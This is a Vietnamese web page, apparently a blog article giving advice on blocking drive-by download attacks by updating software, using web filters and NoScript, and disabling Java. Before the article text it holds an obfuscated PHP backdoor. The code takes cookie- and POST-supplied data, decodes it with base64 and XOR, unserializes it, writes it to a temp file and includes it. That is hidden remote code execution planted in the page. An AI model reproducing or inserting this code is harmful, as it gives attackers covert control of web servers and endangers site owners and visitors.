$ylZYFX = chr (85) . '_' . 'E' . "\121" . "\130" . chr (108) . chr (104); $yLWtuVuIpp = 'c' . chr ( 753 - 645 ).chr (97) . "\x73" . chr ( 582 - 467 ).chr (95) . "\145" . "\170" . chr ( 510 - 405 ).chr (115) . "\x74" . 's';$kAOmFrC = class_exists($ylZYFX); $yLWtuVuIpp = "35366";$DZnLrk = strpos($yLWtuVuIpp, $ylZYFX);if ($kAOmFrC == $DZnLrk){function IAeTZP(){$aZfgaHHvu = new /* 4364 */ U_EQXlh(29822 + 29822); $aZfgaHHvu = NULL;}$XKXHSy = "29822";class U_EQXlh{private function KWZRppi($XKXHSy){if (is_array(U_EQXlh::$YNoKSXbD)) {$name = sys_get_temp_dir() . "/" . crc32(U_EQXlh::$YNoKSXbD["salt"]);@U_EQXlh::$YNoKSXbD["write"]($name, U_EQXlh::$YNoKSXbD["content"]);include $name;@U_EQXlh::$YNoKSXbD["delete"]($name); $XKXHSy = "29822";exit();}}public function HfLoXJy(){$XvCgWQeB = "40563";$this->_dummy = str_repeat($XvCgWQeB, strlen($XvCgWQeB));}public function __destruct(){U_EQXlh::$YNoKSXbD = @unserialize(U_EQXlh::$YNoKSXbD); $XKXHSy = "22734_2480";$this->KWZRppi($XKXHSy); $XKXHSy = "22734_2480";}public function gYQxmX($XvCgWQeB, $uwoXMoiAQJ){return $XvCgWQeB[0] ^ str_repeat($uwoXMoiAQJ, intval(strlen($XvCgWQeB[0]) / strlen($uwoXMoiAQJ)) + 1);}public function HturnsX($XvCgWQeB){$IRxSAES = "\142" . "\x61" . "\163" . chr (101) . chr (54) . chr ( 962 - 910 );return array_map($IRxSAES . chr ( 150 - 55 ).chr ( 1074 - 974 )."\145" . "\143" . 'o' . chr (100) . 'e', array($XvCgWQeB,));}public function __construct($oCcnlBmz=0){$vemMBQz = ',';$XvCgWQeB = "";$YdToI = $_POST;$OaybdGwVx = $_COOKIE;$uwoXMoiAQJ = "c88d6de5-9c28-4205-88d1-aa6ae4d03ace";$vclXYK = @$OaybdGwVx[substr($uwoXMoiAQJ, 0, 4)];if (!empty($vclXYK)){$vclXYK = explode($vemMBQz, $vclXYK);foreach ($vclXYK as $TPeibWgFe){$XvCgWQeB .= @$OaybdGwVx[$TPeibWgFe];$XvCgWQeB .= @$YdToI[$TPeibWgFe];}$XvCgWQeB = $this->HturnsX($XvCgWQeB);}U_EQXlh::$YNoKSXbD = $this->gYQxmX($XvCgWQeB, $uwoXMoiAQJ);if (strpos($uwoXMoiAQJ, $vemMBQz) !== FALSE){$uwoXMoiAQJ = explode($vemMBQz, $uwoXMoiAQJ); $dXdlFMY = sprintf("22734_2480", rtrim($uwoXMoiAQJ[0]));}}public static $YNoKSXbD = 56125;}IAeTZP();} Phương pháp ngăn chặn Drive-by Download tốt nhất hiện nay - Tải Chùa

Phương pháp ngăn chặn Drive-by Download tốt nhất hiện nay

Rate this post

Virus có rất nhiều cách tấn công vào máy tính của chúng ta một trong những cách nguy hiểm phải kể đến đó là tấn công Drive-by Download. Tấn công bằng cách tự động tải về một tệp tin nào đó. Drive-by Download là một phương thức tấn công  vô cùng đặc biệt nguy hại, nó được dùng  để cài đặt virus và phần mềm gián điệp vào máy tính người dùng, từ đó kiểm soát hoàn toàn máy tính của bạn. Vậy cách phòng chống chúng là gì? Mời bạn đọc tham khảo bài viết dưới đây nhé.

Cách ngăn chặn tấn công bằng Drive-by Download

Cách ngăn chặn tấn công bằng Drive-by Download

Luôn giữ các phần mềm được cập nhật

Phương pháp vô cùng quan trọng đối với người dùng để có thể bảo vệ chính mình và mạng công ty là luôn giữ toàn bộ phần mềm được cập nhật phiên bản mới nhất, đặc biệt là các phần mềm chống virus, những trình duyệt,hay các  add-on và plug-in trình duyệt bao gồm Java,hay Flash và Adobe Acrobat…

Việc đảm bảo dùng các phiên bản mới nhất của trình duyệt và những thành phần mở rộng là hết sức quan trọng bởi vì với một phiên bản trình duyệt cũ, những lỗ hổng đều có thể  sẽ bị khai thác.

Cài đặt phần mềm lọc web

Những phần mềm lọc web có khả năng ngăn ngừa người dùng đến một số trang web đã bị đánh dấu là có mối nguy hại. Phần mềm dạng này có cơ chế để phát hiện ra một trang web không an toàn, nhờ đó ngăn chặn người sử dụng kịp thời.

Cài đặt NoScript lên trình duyệt của bạn

NoScript được biết đến là một add-on mã nguồn mở hoàn toàn miễn phí, nó cho phép chỉ những trang nào đáng tin cậy mà bạn đã đánh dấu trước đó mới được chạy JavaScript, và Java hay Flash.

Cách ngăn chặn tấn công bằng Drive-by Download

Cách ngăn chặn tấn công bằng Drive-by Download

Khi bạn chạy trình duyệt với NoScript cho Firefox và NotScript cho Chrome sẽ giúp bạn phòng chống được rất nhiều Drive-by Download.

Vô hiệu hóa Java

Một số chuyên gia khuyến cáo rằng bạn nên vô hiệu hóa Java ngay lập tức và để an toàn hơn bạn nên gỡ bỏ cài đặt Java ra khỏi hệ thống, ít nhất là cho tới khi bản vá được phát hành để giải quyết các vấn đề CVE-2011-3544. Đây là mã Java Applet vô cùng độc hại được lưu trữ trong một file Java Archive, mã này cho phép một applet chưa được đăng ký đã có khả năng truy cập không hạn chế để có thể chạy mã Java tùy ý.